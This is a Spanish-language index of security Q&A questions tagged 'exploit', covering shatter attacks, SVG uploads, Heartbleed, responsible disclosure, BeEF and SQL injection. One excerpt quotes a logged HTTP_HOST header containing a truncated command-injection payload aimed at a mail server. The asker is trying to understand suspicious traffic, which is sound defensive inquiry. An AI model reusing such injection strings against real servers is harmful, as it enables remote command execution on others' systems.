Preguntas con etiqueta 'exploit'

1
respuesta

¿Aún son posibles los ataques de fragmentación en los días de aislamiento de privilegios en la interfaz de usuario?

Antes de que Windows introdujera el aislamiento de privilegios de la interfaz de usuario, cualquier aplicación podía enviar todo tipo de mensajes de ventana a cualquier ventana en el mismo escritorio (un ataque de ruptura), lo que permite la ele...
hecha 08.05.2016 - 18:42
3
respuestas

¿Este encabezado HTTP_HOST no válido forma parte de un exploit?

Recibimos una gran cantidad de mensajes de error de nuestra aplicación django, como este: Invalid HTTP_HOST header: ‘target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$...
hecha 02.06.2017 - 12:06
2
respuestas

¿Explotaciones u otros riesgos de seguridad con la carga de SVG?

Tengo un sitio en el que las personas pueden cargar gráficos, puede que lo veas como un proveedor de imágenes o un foro para fotos. Ahora, permito la carga de gráficos de trama a un tamaño determinado, pero todavía no tengo gráficos vectorial...
hecha 04.02.2012 - 18:33
5
respuestas

¿Qué debe hacer un operador de un sitio web sobre la explotación de Heartbleed OpenSSL?

CVE-2014-0160 enlace Se supone que esta es una pregunta canónica sobre cómo lidiar con el exploit Heartbeat. Ejecuto un servidor web Apache con OpenSSL, así como algunas otras utilidades que dependen de OpenSSL (como cliente). ¿Qué...
hecha 08.04.2014 - 05:10
4
respuestas

Como estudiante, ¿cómo puedo divulgar de manera segura y responsable un problema de seguridad grave en un entorno escolar?

Soy un estudiante en mi escuela local. Hace aproximadamente ocho meses, tropecé en un agujero de seguridad que podría permitir a cualquier usuario descubrir la identificación del estudiante de cualquier en todo el distrito, y soy consci...
hecha 12.09.2015 - 05:13
3
respuestas

¿Cuál es la diferencia entre Exploit y Payload?

En seguridad informática, sabemos que los puntos débiles del software se denominan vulnerabilidades (si están relacionados con la seguridad). Y una vez que se encuentra la vulnerabilidad, en teoría se requiere una pieza de código como prueba d...
hecha 16.04.2013 - 10:25
4
respuestas

¿Ejemplo de un backdoor enviado a un proyecto de código abierto?

Para aclarar de inmediato, no estoy interesado en escribir una puerta trasera. No tengo ningún interés en enviar listas de cambios de puerta trasera a proyectos yo mismo. Estoy investigando algunas técnicas de modelado de fuentes, y estamos i...
hecha 29.10.2012 - 15:45
4
respuestas

¿Cómo funciona BeEF? (entendimiento de trabajo)

Recientemente he encontrado el BeEF - una explotación del navegador tool . En la mayoría de los artículos, se dice una y otra vez que se ha desarrollado con fines de investigación y prueba de pluma. ¿Alguien ha trabajado con esta herramienta?...
hecha 26.09.2012 - 13:10
7
respuestas

¿Cómo explotar la vulnerabilidad "PHP_MAGIC_QUOTES ON" para causar un daño máximo?

He encontrado una gran cantidad de exploits de inyección SQL en algunos sistemas que mantengo. Sé cómo prevenir la inyección, pero me gustaría demostrarle a mi CEO y CTO lo peligroso que es si no nos concentramos lo suficiente en mantener nuestr...
hecha 21.12.2010 - 14:10
3
respuestas

¿Es posible transferir un virus a través del video del navegador?

Sé que ya hay una pregunta relacionada con los virus en los videos, pero la implicación en otra pregunta es que los videos en cuestión han sido descargados y reproducidos por el software de medios en la computadora de destino. La respuesta a e...
hecha 02.05.2016 - 12:30